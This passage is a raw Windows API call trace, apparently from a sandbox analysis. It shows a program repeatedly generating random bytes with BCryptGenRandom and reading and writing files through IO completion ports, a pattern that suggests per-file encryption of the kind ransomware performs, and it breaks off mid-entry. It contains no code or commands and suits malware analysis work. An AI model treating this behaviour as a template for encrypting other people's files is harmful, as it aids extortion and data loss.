0x1fa91d0 [0138.796] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.796] free (_Block=0x1fa91d0) [0138.796] free (_Block=0x77d7a8) [0138.796] free (_Block=0x1fa90b8) [0138.796] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.797] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.805] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.805] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.805] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.805] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.806] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.806] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.806] free (_Block=0x3e305b8) [0138.806] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.806] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.806] free (_Block=0x1fa91d0) [0138.806] free (_Block=0x77d7a8) [0138.806] free (_Block=0x1fa90b8) [0138.806] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.807] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.816] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.817] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.817] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.818] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.818] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.818] free (_Block=0x3e305b8) [0138.818] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.818] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.818] free (_Block=0x1fa91d0) [0138.818] free (_Block=0x77d7a8) [0138.818] free (_Block=0x1fa90b8) [0138.818] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.818] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.825] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.826] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.826] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.826] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.826] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.826] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.826] free (_Block=0x3e305b8) [0138.826] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.826] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.827] free (_Block=0x1fa91d0) [0138.827] free (_Block=0x77d7a8) [0138.827] free (_Block=0x1fa90b8) [0138.827] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0138.827] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.836] CloseHandle (hObject=0x3cc) returned 1 [0138.836] free (_Block=0x1ff1e60) [0138.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.845] CloseHandle (hObject=0x338) returned 1 [0138.845] free (_Block=0x3d70450) [0138.845] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.852] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x175c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.861] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.877] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.878] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.914] CloseHandle (hObject=0x170) returned 1 [0138.915] free (_Block=0x3df0008) [0138.915] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.923] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.924] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.924] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.924] free (_Block=0x3e305b8) [0138.924] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.924] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.925] free (_Block=0x1fa91d0) [0138.925] free (_Block=0x77d7a8) [0138.925] free (_Block=0x1fa90b8) [0138.925] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.925] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.926] CloseHandle (hObject=0x338) returned 1 [0138.926] free (_Block=0x1ff1e60) [0138.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.926] CloseHandle (hObject=0x3cc) returned 1 [0138.927] free (_Block=0x3ef0008) [0138.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.927] CloseHandle (hObject=0xec) returned 1 [0138.927] free (_Block=0x3d70450) [0138.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.927] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.929] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.929] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.929] free (_Block=0x3e305b8) [0138.929] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.929] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.930] free (_Block=0x1fa91d0) [0138.930] free (_Block=0x77d7a8) [0138.930] free (_Block=0x1fa90b8) [0138.930] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.930] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.946] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4930, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.946] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.947] CloseHandle (hObject=0x170) returned 1 [0138.947] free (_Block=0x3df0008) [0138.947] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.954] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.955] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.955] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.955] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.955] free (_Block=0x3e305b8) [0138.955] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.955] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.955] free (_Block=0x1fa91d0) [0138.955] free (_Block=0x77d7a8) [0138.955] free (_Block=0x1fa90b8) [0138.955] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.956] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.956] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.966] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1560, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.967] CloseHandle (hObject=0x170) returned 1 [0138.967] free (_Block=0x3df0008) [0138.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.976] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.977] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.977] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.977] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.977] free (_Block=0x3e305b8) [0138.977] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.977] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.977] free (_Block=0x1fa91d0) [0138.977] free (_Block=0x77d7a8) [0138.977] free (_Block=0x1fa90b8) [0138.977] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.978] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.979] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.979] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.979] CloseHandle (hObject=0x170) returned 1 [0138.979] free (_Block=0x3df0008) [0138.979] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.986] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.986] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0138.986] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.986] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0138.987] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.987] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.987] free (_Block=0x3e305b8) [0138.987] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.987] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.987] free (_Block=0x1fa91d0) [0138.987] free (_Block=0x77d7a8) [0138.987] free (_Block=0x1fa90b8) [0138.987] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.988] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0138.997] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7c44, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.998] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.008] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x43b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.009] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.019] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1cd8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.020] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.020] CloseHandle (hObject=0x170) returned 1 [0139.020] free (_Block=0x3df0008) [0139.021] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.027] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.027] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0139.027] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.028] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0139.028] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.028] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.028] free (_Block=0x3e305b8) [0139.028] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.028] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.028] free (_Block=0x1fa91d0) [0139.028] free (_Block=0x77d7a8) [0139.029] free (_Block=0x1fa90b8) [0139.029] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.029] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.030] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5430, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.030] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.031] CloseHandle (hObject=0x170) returned 1 [0139.039] free (_Block=0x3df0008) [0139.039] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0139.046] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.046] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0139.046] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.047] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0139.047] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.047] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.047] free (_Block=0x3e305b8) [0139.047] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.047] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.047] free (_Block=0x1fa91d0) [0139.047] free (_Block=0x77d7a8) [0139.047] free (_Block=0x1fa90b8) [0139.047] WriteFile (in: 